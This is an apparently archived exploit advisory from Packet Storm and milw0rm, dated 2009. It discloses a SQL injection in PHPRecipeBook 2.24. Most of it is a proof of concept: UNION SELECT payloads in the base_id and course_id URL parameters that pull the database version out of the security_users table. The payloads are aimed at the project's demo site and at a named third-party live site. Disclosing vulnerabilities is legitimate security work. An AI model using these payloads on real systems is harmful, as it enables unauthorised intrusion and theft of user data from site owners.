PHPRecipeBook 2.24 SQL Injection

2009-03-09T00:00:00
ID PACKETSTORM:75535
Type packetstorm
Reporter d3b4g
Modified 2009-03-09T00:00:00

Description

                                        
                                            `[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability  
[-]   
[+] Discovered By d3b4g   
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/   
[+] Greetz : str0ke | Inerd | & friends  
[-] Follow me on twitter www.twitter.com/schaba  
  
  
About:  
------>  
PHPRecipeBook is a Web-based cookbook with the   
ability to create shopping lists from recipes selected.  
The lists can be saved and later reloaded and edited.   
The shopping list also attempts to combine similar items  
so that duplication does not occur.   
  
  
  
/* start  
  
0x1   
  
Proof of concept   
-------------------------------------  
  
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--  
  
  
/* end  
  
-------------------------------------  
From Tiny Little island of Maldivies   
-------------------------------------  
  
# milw0rm.com [2009-03-10]`